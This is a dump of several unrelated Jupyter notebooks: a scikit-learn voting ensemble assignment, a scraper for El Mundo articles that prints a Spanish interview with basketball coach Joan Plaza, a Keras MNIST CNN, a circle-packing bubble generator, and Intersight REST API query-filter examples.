path | concatenated_notebook
---|---
TP2/08 - Voting.ipynb | ###Markdown
Practical Assignment 2: Analysis with Voting - Organización de Datos **Students and student IDs** * Grassano, Bruno - 103855 * Romero, Adrián - 103371 https://github.com/brunograssano/TP-Organizacion-de-datos We import the libraries
###Code
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
from sklearn.model_selection import KFold, StratifiedKFold
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier, VotingClassifier
from sklearn import tree
from preprocessing import prepararSetDeDatos
from preprocessing import prepararSetDeHoldout
from preprocessing import prepararSetDeValidacion
from preprocessing import conversionAVariablesNormalizadas
from preprocessing import expansionDelDataset
from funcionesAuxiliares import mostrarAUCScore
from funcionesAuxiliares import mostrarROCCurve
from funcionesAuxiliares import mostrarMatrizDeConfusion
from funcionesAuxiliares import escribirPrediccionesAArchivo
from funcionesAuxiliares import obtenerDatasets
from funcionesAuxiliares import obtenerHoldout
###Output
_____no_output_____
###Markdown
We import the data and process it
###Code
X,y = obtenerDatasets()
X = prepararSetDeDatos(X)
y = prepararSetDeValidacion(y)
###Output
_____no_output_____
###Markdown
Voting This model is an ensemble that combines several models, which vote on which class an instance belongs to. In this case, we decided to build the ensemble using the models that gave us the best results (according to the AUC-ROC metric) in the other notebooks. The chosen ones were: * Decision tree * SVM * Random Forest * Logistic regression Each of these models is recreated with the best hyperparameters found in its notebook. For the preprocessing we first tried the basic one, which includes all of the columns that come in the dataframe.
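As a quick aside (a minimal sketch with made-up probabilities, not part of the original pipeline): with `voting='soft'`, as used below, the ensemble averages the class probabilities predicted by each model and picks the most probable class, while `'hard'` voting takes a majority vote over the predicted labels.

```
import numpy as np

# Hypothetical class-1 probabilities from three base models for a single instance
probas = np.array([0.62, 0.48, 0.71])

# Soft voting: average the probabilities, then threshold at 0.5
soft_vote = int(probas.mean() >= 0.5)                       # -> 1

# Hard voting: majority vote over the individual label predictions
hard_vote = int((probas >= 0.5).sum() > len(probas) / 2)    # -> 1

print(soft_vote, hard_vote)
```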
###Code
X_voting = conversionAVariablesNormalizadas(X)
###Output
_____no_output_____
###Markdown
We split the dataset into training and test sets.
###Code
X_train, X_test, y_train, y_test = train_test_split(X_voting, y, test_size=0.25, random_state=0)
###Output
_____no_output_____
###Markdown
We initialize the models that Voting will use, each with the best hyperparameters that were found. In the case of random forest, the depth was reduced somewhat.
###Code
regresion_logistica = LogisticRegression(penalty = 'none', solver = "saga",max_iter = 5000)
random_forest = RandomForestClassifier(n_estimators=100, random_state=0,criterion='entropy',max_depth=7)
svm = SVC(C=200, kernel='rbf', gamma=0.1,probability=True)
arbol = tree.DecisionTreeClassifier(random_state=117, max_depth=4, criterion = 'gini')
###Output
_____no_output_____
###Markdown
We create the model and train it.
###Code
voting = VotingClassifier(estimators=[('lr', regresion_logistica), ('rf', random_forest),('svm',svm),('tree',arbol)], voting='soft')
voting.fit(X_train, y_train)
###Output
_____no_output_____
###Markdown
Metrics evaluation Now we make the predictions and look at the metrics.
###Code
y_pred = voting.predict(X_test)
print(classification_report(y_test, y_pred, target_names=['No vuelve','Vuelve']))
mostrarMatrizDeConfusion(y_pred,y_test)
mostrarROCCurve(voting,"Voting",X_test,X_train,y_test,y_train)
mostrarAUCScore(voting,"Voting",X_test,y_test)
###Output
_____no_output_____
###Markdown
We observe an improvement compared to the other models in several of the metrics, if not all of them. With another preprocessing Let us now see whether we can improve this result using the expanded dataframe.
###Code
X = expansionDelDataset(X)
X.head()
columnas_codificables_extra = ['pago_categorizado','edades_estratificadas','categoria_invitados']
columnas_numericas_extra = ['2_clusters','4_clusters','10_clusters','cantidad_total_invitados','total_pagado']
X_voting_exp = conversionAVariablesNormalizadas(X,columnas_codificables_extra,columnas_numericas_extra)
X_train, X_test, y_train, y_test = train_test_split(X_voting_exp, y, test_size=0.25, random_state=0)
voting_exp = VotingClassifier(estimators=[('lr', regresion_logistica), ('rf', random_forest),('svm',svm),('tree',arbol)], voting='soft')
voting_exp.fit(X_train, y_train)
###Output
_____no_output_____
###Markdown
We evaluate.
###Code
y_pred = voting_exp.predict(X_test)
print(classification_report(y_test, y_pred, target_names=['No vuelve','Vuelve']))
mostrarROCCurve(voting_exp,"Voting",X_test,X_train,y_test,y_train)
mostrarAUCScore(voting_exp,"Voting",X_test,y_test)
###Output
_____no_output_____
###Markdown
We see that it got worse when using all of the new information. One more preprocessing Let us see whether removing some columns changes anything. We drop the 10-clusters result column and the total number of guests column.
###Code
columnas_codificables_extra = ['pago_categorizado','edades_estratificadas','categoria_invitados']
columnas_numericas_extra = ['2_clusters','4_clusters','total_pagado']
X_voting_exp2 = conversionAVariablesNormalizadas(X,columnas_codificables_extra,columnas_numericas_extra)
X_train, X_test, y_train, y_test = train_test_split(X_voting_exp2, y, test_size=0.25, random_state=0)
voting_exp2 = VotingClassifier(estimators=[('lr', regresion_logistica), ('rf', random_forest),('svm',svm),('tree',arbol)], voting='soft')
voting_exp2.fit(X_train, y_train)
###Output
_____no_output_____
###Markdown
We evaluate this preprocessing.
###Code
y_pred = voting_exp2.predict(X_test)
print(classification_report(y_test, y_pred, target_names=['No vuelve','Vuelve']))
mostrarROCCurve(voting_exp2,"Voting",X_test,X_train,y_test,y_train)
mostrarAUCScore(voting_exp2,"Voting",X_test,y_test)
###Output
_____no_output_____
###Markdown
It improved considerably compared to the previous one, but did not manage to beat the first preprocessing's metric. Predictions on the new file We now make predictions on the newly provided file.
###Code
holdout = obtenerHoldout()
ids_usuarios = np.array(holdout['id_usuario'])
holdout = prepararSetDeHoldout(holdout)
holdout_voting = conversionAVariablesNormalizadas(holdout)
###Output
_____no_output_____
###Markdown
We make the predictions and write them to the CSV file.
###Code
predicciones_holdout = voting.predict(holdout_voting)
escribirPrediccionesAArchivo(predicciones_holdout,"Voting",ids_usuarios)
###Output
_____no_output_____ |
scrape_mondo_doc_sp.ipynb | ###Markdown
200, 1100, 2300, 4100, 6800, 8000, 8700, 10700, 14900 convert
###Code
import os
import json

import numpy as np
import pandas as pd

doc_list = os.listdir("./data/mondo_scraped/contents_sp/")
articles = dict()
for file in doc_list:
if file[-4:] == 'json':
with open(os.path.join("./data/mondo_scraped/contents_sp/", file), "r") as f:
articles.update(json.load(f))
len(articles)
clean = {k: v for k, v in articles.items() if v is not None}
len(clean)
docs = pd.DataFrame.from_dict(clean, orient='index')
valids = docs.loc[docs['keyfacts'].astype(bool), :]
valids.shape
valids.head()
valids.to_pickle('./data/elmondo_es_sp.pkl')
valids.iloc[7, :].apply(print);
###Output
'Trabajé en el patio de la prisión de Lleida con el Vaquilla, tras 14 años en una cárcel lo relativizas todo'
[' EL MUNDO prepara la Copa del Rey con el entrenador anfitrión en el mítico Pimpi Florida ', ' "Si la Liga no es más seria se nos irá de las manos" ', ' "El Real Madrid tiene la confianza para llegar a cotas que ni ellos mismo esperan" ', ' "Barcelona, como otras veces Madrid, Unicaja o Laboral Kutxa, está rehaciendo lo andado" ', ' "O mejoramos todos la calidad del producto o será difícil que esto no se convierta en una Liga menor" ', " Un 'beatle' en el templo de la Copa "]
En las paredes, plantillas añejas del Unicaja, entre fotos de folclóricas, Garbajosa con el fisio de los Toronto Raptors o guiños de la selección a un taberna que huele a mar, vino, copla, Beatles y baloncesto. Joan Plaza se encontró con un santuario: El Pimpi Florida.
Pregunta.-Le hemos traído aquí y confiesa que no bebe...
Respuesta.-Nunca había bebido whisky hasta que me nombran entrenador del Madrid, me decían que tomara whisky porque no da resaca y lo hice, pero nunca me he tomado dos. No recuerdo estar borracho.
P.- Pues ganó títulos como para emborracharse alguna vez...
R.- Gané la Liga, estaba allí en medio de todo el mundo medio tirado, me puse en la piel del otro entrenador y casi me disculpé por haber ganado: lo siento. Cuando gané la Uleb, si hubiese podido desaparecer, lo hubiese hecho. Me fui a Trifunovic, y le dije: "la próxima vez ganarás tú". Acabé y me escondí, en aquel momento sólo pensaba en todos los que no habían estado: hay gente que no tienen nombres comerciales y también podrían estar aquí y haber ganado esto. Pensaba: 'pero déjate llevar'. Sentía una felicidad brutal, pero la apartaba.
P.-¿Heredó esa coraza de su época como funcionario de prisiones?
R.-Si has pasado 14 años en una prisión, lo relativizas todo. Cuando se pierden varios partidos seguidos aquí, en Madrid o Sevilla se dramatiza todo. Sacas conclusiones pero no te pones en la piel del jugador, periodista o directivo que se pone a la defensiva, con mucho miedo.
P.-¿Algún momento movido en sus guardias nocturnas?
R.-Tuve un motín bonito. Mi segunda noche en la prisión de Lleida, teníamos que quedarnos un funcionario de Granada y yo a pasar la noche con 300 internos. Esto pasa en todas las prisiones, por la noche hay menos gente. Tenía que revisar cada celda por la mirilla, que estuviesen todos dentro, los presos te saludaban [hace la peseta], oí un follón y me dijeron que subiese, que alguien se había salido de la celda. Uno de los que había estado en la fuga del Vaquilla retaba a todos para que entraran en su galería. El jefe dijo que entráramos: le abrió la cara de lado a lado con un barrote de la litera. No entraré en detalles, fue curioso. Llegué a casa manchado de sangre y dije: nunca más, no vuelvo. Aquella noche fue mucho más larga de lo que he dicho, hubo cortes de venas, barrigas...Trabajé en el patio de la prisión de Lleida con el Vaquilla. Tres años en la prisión de jóvenes y diez en la otra.
El entrenador del Unicaja Joan Plaza en el Pimpi Florida, Málaga.
CARLOS DÍAZ
"A la gente le gustaría ir más rápido con la progresión del Unicaja pero sería como cocer y freír todo lo que hay aquí muy rápido...no sirve".
P.- Bueno, esa experiencia le serviría en según qué banquillos de la NBA...
R.- La tipología de entrenador allí, excepto Popovic en San Antonio y alguno más, son ex jugadores que toleran que el jugador, profesional de por sí, trabaje en el partido y no tanto en el entrenamiento,que tenga una vida mucho más distinta al concepto que tenemos más en Europa. Ojalá se dé esa circunstancia. Siempre he dicho que es verdad que me gustaría entrenar equipos grandes, llevar la Selección Española, la NBA, pero también he dicho muchas veces que si eso no ocurre pero eso tira de ti para que cada día seas mejor, pues bienvenido. Es mi zanahoria, puede ser que nunca pase nada, pero estoy contento de los proyectos que tengo. Me halaga que la gente piense que eres capaz de revertir una situación complicada en algunos clubes. Me gusta volver a Madrid, como volví a Sevilla, y que haya personas de pie aplaudiéndote. Eso es que algo bueno has hecho, y de momento pasa en todos los sitios donde estuve. Hay mucha gente que ha ayudado a que eso sea así y estoy muy orgulloso.
.P- ¿Qué tal en Málaga?, ¿Qué le parece la ciudad?
R.- Percibo que la sociedad malagueña es más cosmopolita de lo que esperaba. Gente más tolerante, aunque no sea tan monumental como Sevilla, donde fui muy feliz, es cierto que hay un riqueza que no es constatable, no es física. Veo a gente con mucha más capacidad de creación, el movimiento que me explican del mundo de la música, el cine que se mueve entre bambalinas, lugares tan peculiares como éste... Se acerca más a la idea de ciudad de Barcelona de lo que yo esperaba. La gente es mucho más abierta y es un lugar donde poder saca muchos recursos literarios, hay margen y gente peculiar como para que puedan salir reflejadas en tus novelas.
P.-¿Así que incentiva esa faceta suya de escritor?
R.- No puedo considerarme escritor si juzgo que una persona está preparada para ello como yo lo estoy para entrenar. Un día empecé a escribir estando en prisión una novela que se ha publicado en tres idiomas distintos, que está agotada, los 300 únicos ejemplares que hay en castellano. Está a punto de llegar aquí, pero me sorprende que se haya vendido o que me llegue gente hablando de ello. En Estambul [en el hotel del Unicaja en Euroliga] se presentó un argentino a hablar del libro y me parece algo espectacular porque son anotaciones al viento, son anotaciones en forma novelada que han despertado la inquietud en un tipo de gente y que sólo pretenden estimular que la gente pelee por sus sueños. Mi novela no tiene más sentido que este. Me gusta que sea un libro de cabecera para mucha gente, en Lituania, la última semana antes de irme hicimos una firma de libros y se presentó una persona con 50 notas de distintos colores en distintas hojas con sus reflexiones personales. Me parece increíble porque yo no tengo la formación para ser escritor, pero se han vendido todas las que he escrito, la segunda novela espero que salga este mismo año. Siempre dejo guiños a los lugares en los que he vivido, sería muy buena señal que estuviese aquí el tiempo suficiente y no me echaran antes de tiempo como para que dejara reflejado en mis novelas mi paso por Málaga, por el Pimpi Florida y otros muchos lugares.
P.- ¿Cómo llega su equipo a la Copa?
R.-Sólo nos planteamos mejorar los números de los años anteriores, eso no oculta que seamos ambiciosos. A la gente le gustaría ir más rápido pero sería como cocer y freír todo lo que hay aquí muy rápido...no sirve. Para que perdure en años y que no sea sólo una temporada, hay que hacerlo de una forma lenta y dura. Contento, el equipo va a más.
P.- Pero le está costando reconciliar a la afición con el equipo a pesar de que la temporada no es mala, ¿Le hace falta una gran gesta?
R.-Es probable que esa sea una de las recetas. Más allá de la seriedad de este proyecto o que ahora haya mejores números que el año pasado con menos presupuesto, sería un gran subidón una buena Copa del Rey, no sólo ganándola, que sería mucho, pero compitiendo hasta la final. Hacer unos 'play-offs' duros, serios. Hemos de recuperar a toda la gente que ha salido de este proyecto y ahora lo vive colateralmente para que vuelvan dentro de la dinámica del equipo. Una Copa del Rey nos ayudaría a estar arriba.
P.- ¿Se quedará con Domantas Sabonis?
R.- El club demandaba, y yo entendía que era cierto, que tiene una gran cantera detrás que o se apuesta o no por ella. Los juniors ha sido subcampeones en el torneo de Hospitalet, los infantiles han ganado su torneo. El equipo LEB está en buena tesitura y no podemos jugar a dos barajas: o jugamos la de no cantera y nos olvidamos del tema o la jugamos, pero en ese caso hay que hacerlo en serio. Tenemos un jugador con un potencial como el de Sabonis, Todorovic, Maodo...Son jugadores con potencial de ser muy importantes en uno o dos años. Si tenemos la suerte de que Sabonis siga el año que viene, que es la gran duda, la inversión de este año la recogeremos el año que viene o el siguiente.
P.- Pero el hombre a convencer es Sabonis, Arvydas; padre de la criatura...
R.- Sí, se debe encontrar en una situación complicada porque quiere que el chico siga estudiando. Domantas es un buen estudiante, tiene la opción de poder ir a universidades americanas y tiene que decidir ya no en verano, sino antes, porque de lo contrario esta apuesta quedará como un brindis al sol y no servirá para nada. Habría que replantearlo y quizás pensar en otro jugador que ocupara esa plaza. Pero ahora los jugadores que están en el junior, el LEB y el cadete ven que el primer equipo no está tan lejos, que no es tan difícil. Nos gustaría tener jugadores malagueños o criados en la cantera de una forma más regular como hubo hace unos años, pero eso requiere un tiempo, un proceso. No he hablado con él del tema, vendrá a la Copa del Rey; hablé con él en Lituania pero no de ese tema.
P.-¿Cómo ve al Real Madrid?
R.-Tienen una confianza que les puede hacer estar cerca de completar la temporada perfecta. No fallar ni una, están cerca de esa capacidad no sólo porque técnicamente son muy buenos y tienen una plantilla muy compensada, sino porque tienen un nivel de autoconfianza brutal y eso les puede llevar a cotas que ni ellos mismo esperaban.
P.-¿Y qué le pasa al Barcelona?
El entrenador del Unicaja Joan Plaza posa tras la barra del Pimpi Florida, Málaga.
CARLOS DÍAZ
"Sabonis tiene la opción ir a universidades americanas y tiene que decidir antes de verano, porque de lo contrario esta apuesta será un brindis al sol, no servirá para nada".
R.- Lo que a veces le ha pasado a otros grandes como el Real Madrid, que la reconversión no se ha hecho a tiempo y cuando la vas a hacer tienes que cambiar muchas piezas. Hay proyectos que se erosionan con el tiempo y es muy difícil mantener el status quo que has tenido durante varios años. El secreto del deporte profesional es reconocer el momento en el que estás perdiendo facultades y no atrincherarte sino empezar a cambiar. Barcelona, como otras veces Madrid, Baskonia y Unicaja, está rehaciendo lo andado.
P.-¿Debió prever el cambio?
R.-Sí, o Baskonia que muchos años ha estado por encima de sus posibilidades: vendían y se mantenían arriba. Este año por fin demostraron que son humanos y necesitarán un tiempo para estar arriba.
P.-Y la ACB, ¿necesita cambiar?
R.- Está en un punto no tanto crítico como de reinventarse otra vez. Hay que anticiparse al problema que viene, no sólo que la gente sufre para llenar los pabellones, sino que hay una Euroliga que crece exponencialmente, los sponsors se giran a la liga más fuerte. O damos un paso adelante y hacemos una liga más seria, competitiva y organizada o se nos escapará de las manos.
P.- Aunque ganó varios títulos, vivió el año pasado lo que viven algunos en la ACB esta campaña: trabajar sin cobrar, ¿Qué le parece?
R.- Cobré hasta enero aunque el banco se declaró en bancarrota y deben dinero de la primera parte del año, la segunda parte la cobraré en tres o cuatro años. También es difícil encontrar a un entrenador que en su carrera le hayan pagado puntual siempre. Tuve que vivir esa experiencia y decidir si dejarlo todo y venir a España o seguir hasta el final. Decidí quedarme, ganamos la Liga y ha sido beneficioso para mí y para los que estuvieran a mi lado. Me preocupa mucho que haya jugadores y entrenadores que estén por debajo del mínimo interprofesional que está estipulado por la propia ACB. Todos lo sabemos y nos cuesta no arreglarnos. A lo mejor hemos de ir a una Liga un poco más corta, donde la competitividad sea mayor, donde no hayan tantas diferencias en el marcador pero en el que se pague lo que se pacte al inicio de la temporada. Es importante que hagamos un baloncesto atractivo, hay más competitividad que antes, el fútbol sigue atrayendo a gran parte de la oferta que hay. O mejoramos todos la calidad del producto o será difícil que esto no se convierta en una Liga menor.
P.-Catalán y ex del Real Madrid, ¿qué le parece la consulta?
R.-Una de las cosas buenas que podemos hacer en esta vida es coger una maleta e irte. Cuando me fui de Barcelona a Madrid me sorprendió que la realidad que se explicaba en Madrid era muy distinta a la que vivía en Barcelona. ¿Cual era cierta? Ninguna de las dos, no es cierto lo que decían los medios catalanes ni lo que explicaban en Madrid. Hablaba con gente en Madrid porque la idea que se explicaba era equivocada, y les decía que no me hicieran caso: llamemos a Aíto García Reneses que es madrileño, vive en Cataluña desde hace muchos años y que él os dé la perspectiva. Pero escuchad a la gente que vive allí, no os guiéis por lo que veis por televisión porque se vende una crispación que no existe como tal, pero es a la que mucha gente saca partido.
P.- ¿Perdió amigos por el asunto?
R.- No, pero me he dado cuenta de que mucha gente no es capaz de ponerse en tu piel. Fui entrenador del Real Madrid y estoy orgullosísimo de haberlo sido, tengo amistades allí que no quiero perder nunca en mi vida. Pero hay mucha gente muy radical a la que le cuesta entender que quien te ha dado la primera oportunidad de primer nivel mundial es el Real Madrid, y yo soy catalán. Soy el primer catalán de la historia que entrena al Madrid de baloncesto y probablemente al de fútbol. Estoy orgulloso de haberlo vivido, he aprendido un montón, soy más capaz, más listo, pero también le pasará lo mismo a Aíto que ha estado en Barcelona durante 40 años. Las fronteras que nos montamos a veces son bastante ingenuas.
P.- Metidos en harina, y con sus antecedentes habrá que preguntarle por la 'doctrina Parot'...
R.- Hay que estar en la piel del otro, tener un gran nivel de empatía. Cuando alguien sufre en sus carnes lo que sufre una de estas personas que luego se ha podido acoger a la doctrina Parot es normal que estén molestas o dolidas, pero entendiendo ese dolor, lo que está claro es que hay una ley que hay que mejorar. La ley, no sólo la penitenciaria, también la ley general en este aspecto. Hay que mejorar y ceñirnos todos a la misma, nos guste o no. Hay que encontrar la manera en la que podemos mejorarla si creemos que es posible. En la vida, estoy enfermo de esto, hay que ser empáticos, hay que saber por qué se protesta, por qué se acomodan, por qué no lo hacen...
P.- Bueno, Joan, antes de la Copa, ¿Por qué brinda?
R.- Porque tenemos el tren sobre las vías y estamos en condiciones. No esperábamos la posición en Liga, el equipo desprende cosas importantes y estamos recolectando gente que estaba desengañada. Pidamos más carbón para la caldera. Ser cabezas de serie es un gran empuje,pero creo en las cosas progresivas, no en las varitas mágicas. El Madrid es el claro favorito, si sigue con esta autoridad será difícil rebatírselo y habrá que competir en nuestra liga que es más abajo.
[]
2014-02-03
|
notebook/mnist_cnn.ipynb | ###Markdown
Trains a simple convnet on the MNIST dataset.
###Code
'''Trains a simple convnet on the MNIST dataset.
Gets to 99.25% test accuracy after 12 epochs
(there is still a lot of margin for parameter tuning).
16 seconds per epoch on a GRID K520 GPU.
'''
from __future__ import print_function
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
batch_size = 128
num_classes = 10
epochs = 12
# input image dimensions
img_rows, img_cols = 28, 28
# the data, shuffled and split between train and test sets
(x_train, y_train), (x_test, y_test) = mnist.load_data()
if K.image_data_format() == 'channels_first':
x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)
x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
###Output
Using TensorFlow backend.
|
Example Notebooks/Bubble Generator.ipynb | ###Markdown
Step 1: Generate a random convex hull
###Code
from koebe.algorithms.incrementalConvexHull import randomConvexHullE3WithHighDegreeVertex
mesh = randomConvexHullE3WithHighDegreeVertex(100, 20)
mesh.outerFace = mesh.verts[-1].remove()
# Run this block if you want to see the mesh
from koebe.graphics.spherical2viewer import *
viewer = S2Viewer(600,600)
viewer.toggleSphere() # Hide the sphere
viewer.addAll(mesh.edges)
viewer.show()
###Output
_____no_output_____
###Markdown
Step 2: Circle pack the convex hull
###Code
from koebe.geometries.euclidean2 import PointE2
from koebe.algorithms.hypPacker import *
def orthProj(p):
return PointE2(p.x, p.y)
dists = [(orthProj(v.data) - PointE2.O).normSq() for v in mesh.verts]
closestToOriginIdx = dists.index(min(dists))
packing, _ = maximalPacking(
mesh,
num_passes=1000,
centerDartIdx = mesh.darts.index(mesh.verts[closestToOriginIdx].aDart)
)
# Run this to view the circle packing
from koebe.graphics.euclidean2viewer import PoincareDiskViewer, makeStyle
viewer = PoincareDiskViewer(600, 600)
viewer.addAll(packing.verts)
#d = DiskOP2(1,0,0,-1)
#viewer.add(d)
#viewer.setStyle(d, makeStyle(fill='#00ff00'))
viewer.show()
from koebe.algorithms.inversiveVoronoi import inversiveVoronoi as IV
from koebe.geometries.orientedProjective2 import DiskOP2
sgPacking = packing.duplicate(
vdata_transform = lambda vData : DiskOP2.fromCircleE2(vData.toPoincareCircleE2()).toDiskS2()
)
# Run this block if you want to see the mesh
from koebe.graphics.spherical2viewer import *
viewer = S2Viewer(600,600)
viewer.toggleSphere() # Hide the sphere
viewer.addAll(sgPacking.verts)
blueStyle = makeStyle(stroke="#00f", strokeWeight=1, fill="rgba(255, 255, 255, 0.5)")
for v in sgPacking.verts:
viewer.setStyle(v, blueStyle)
viewer.show()
arcs = IV(sgPacking)
arcs2D = [arc.sgToCircleArcOP2() for arc in arcs]
disks2D = [v.data.sgProjectToOP2() for v in sgPacking.verts]
# Get toSVG method implemented here.
arcs2D[0]
# Something along these lines (sketch: assumes a toSVG() helper and an svgFilePath variable are defined elsewhere)
print("Writing SVG file...")
svgStr = toSVG(512.0)
f = open(svgFilePath, 'w')
f.write(svgStr)
f.close()
print("Done.")
###Output
_____no_output_____ |
resources/ucs/intersight/intersight.ipynb | ###Markdown
Intersight REST API Query Parameter Usage Examples Intersight supports the use of a query language in the URI of a REST API request, as query parameters. This Notebook includes examples of using the Intersight query language to **filter results returned to the REST client, on the server/Intersight side**. This process can simplify the effort to filter results on the client side.- Filter options include: - `eq`, `ne`, `gt`, `lt`, `ge`, `le` - `$filter=NumCpus ge 4` - `and`, `or`, `not` - `($filter=NumCpus ge 4 and NumCpus le 8)` - `in` - `($filter=Model in ('HX220C-M5SX', 'UCSC-C240-M5SN'))` - `contains` - `($filter=contains(Model, B200))` - `startswith` - `($filter=startswith(Model, UCSC))` - `endswith` - `($filter=endswith(Model, M5))` - `tolower`/`toupper` - `($filter=contains(Model, toupper(b200)))`Reference: [Intersight Query Syntax](https://intersight.com/apidocs/introduction/query/ "Intersight Query Syntax") --- Import the `intersight_helper` functions Intersight API Authentication Setup **IMPORTANT** Be sure to follow the instructions [**here**](https://wwt.github.io/dcauto-study-resources/sections/section_4/hands-on-learning ) before you attempt to run the next and subsequent cells in this notebook.
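As a quick combined illustration (untested here; the filter values are made up), several of the operators listed above can be chained in a single `params` string once the `intersight_helper` functions below are imported and authentication succeeds:

```
results = intersight(
    method='GET',
    endpoint='/compute/Blades',
    params="$filter=contains(Model, B200) and NumCpus ge 2&$select=Dn,Model,NumCpus&$orderby=Dn"
)
```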
###Code
# Setup exception handling for the Intersight authentication process
try:
# Attempt to import the functions in the `intersight_`helper` module - this import attempts Intersight authentication.
from intersight_helper import *
from requests import HTTPError
# Handle missing keyId.txt and keySecret.txt files
except FileNotFoundError as e:
print('Unable to locate authentication key and signature file combination.')
print(f'{e!r}')
print(f'{e.filename!r}')
###Output
_____no_output_____
###Markdown
Test to determine if authentication and authorization are successful.
###Code
# Determine if the keyId.txt and keySecret.txt files successfully authenticate
try:
results = intersight(
method='GET',
endpoint='/compute/Blades'
)
except HTTPError as e:
print('The Intersight authentication process failed.\n'
'Please be sure to follow the "Intersight API Authentication Setup" directions above before continuing.')
# The Intersight API authentication and authorization process is successful if you see `200 OK` below
###Output
HTTP response: 200 OK
Objects returned: 18
###Markdown
--- Create a helper function to display query results.
###Code
from typing import Dict, List
def display_results(
results: Dict,
fields: List = None
) -> None:
""" Helper function to display query results.
Args:
results (Dict):
Dictionary of results returned by the Intersight
API call.
fields (List, optional):
Optional List of dictionary fields to display.
'Dn' is automatically included.
Returns:
None.
"""
# Alias results['Results']
results = results.get('Results', list())
# Check count of results
if len(results) == 0:
print('No results found.')
return
for index, result in enumerate(results):
# Display current and total results count
print(f'{index + 1} of {len(results)}')
# Display the 'Dn' for each result
print(f'DN: {result.get("Dn", "N/A")}')
# Display any optional fields
if fields is not None:
for field in fields:
print(f'\t{field}: {result.get(field, "N/A")}')
print()
###Output
_____no_output_____
###Markdown
--- Examples Filter for specific resources, using matching criteria
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$filter=NumCpus ge 4'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'NumCpus'
]
)
###Output
HTTP response: 200 OK
Objects returned: 2
1 of 2
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
NumCpus: 4
2 of 2
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
NumCpus: 4
###Markdown
--- Return/select only certain matching properties
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$select=Model,Dn,Serial'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'Serial'
]
)
###Output
HTTP response: 200 OK
Objects returned: 18
1 of 18
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
2 of 18
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
3 of 18
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
4 of 18
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
5 of 18
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
6 of 18
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
7 of 18
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
8 of 18
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
9 of 18
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
Serial: SRV124
10 of 18
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
11 of 18
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
12 of 18
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
13 of 18
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
14 of 18
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
15 of 18
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
16 of 18
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
17 of 18
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
18 of 18
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
Serial: SRV124
###Markdown
--- Pagination, return the top N results only
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$top=3'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'Serial',
'NumThreads'
]
)
###Output
HTTP response: 200 OK
Objects returned: 3
1 of 3
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
NumThreads: 16
2 of 3
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
NumThreads: 32
3 of 3
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
NumThreads: 16
###Markdown
--- Pagination, skip the top N results only
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$skip=3'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'Serial',
'NumThreads'
]
)
###Output
HTTP response: 200 OK
Objects returned: 15
1 of 15
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
